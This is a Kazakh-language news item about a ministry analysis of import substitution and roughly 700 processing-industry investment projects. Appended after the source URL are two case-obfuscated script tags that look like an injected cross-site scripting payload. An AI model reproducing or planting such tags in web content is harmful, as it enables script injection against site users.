ИИДМ басшысы: біз өңдеуші саламызды қолдауға, инфрақұрылымды қамтамасыз етуге, арзан қаржы ресурстарына қол жеткізуге дайынбыз Мемлекет басшысының тапсырмасына сәйкес Индустрия және инфрақұрылымдық даму министрлігі өңдеу өнеркәсібіндегі қазіргі мүмкіндіктер мен даму перспективаларын зерделеді. Талдау Қазақстан Республикасының ішкі нарықты дайын өніммен импортты алмастыру мүмкіндігі мен экспорттық әлеуетті арттыру перспективаларын ескере отырып жүргізілді. Сондай-ақ шикізат базасы, кадрлардың құзыреттілігі және инфрақұрылымның болуы есепке алынды. Талдау қорытындысы мен ұсыныстар жайлы Орталық коммуникациялар қызметі алаңында ведомство басшысы Қайырбек Өскенбаев баяндады. Оның мәліметінше, импорттың жалпы сомасы 38,4 млрд АҚШ долларын құрады. Елге машина жасау, химия өнеркәсібі, қара металлургия, жеңіл өнеркәсіп, құрылыс материалдары, түсті металлургия өнімдері үлкен көлемде жеткізіледі. Терең талдау қорытындылары бойынша министрлік әкімдіктерімен бірлесіп, өңдеу өнеркәсібі салаларында инвестициялық жобалар пулын қалыптастырды. Осылайша, 131,2 мың жаңа тұрақты жұмыс орнын құра отырып, жалпы сомасы 20 трлн теңге болатын 700-ге жуық жобаның тізбесі анықталды. https://ortcom.kz/kk/novosti/1649141060<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

06.04.2022
Просмотров: 287


Пікір қосу



Деректерді қолтаңбаға қосу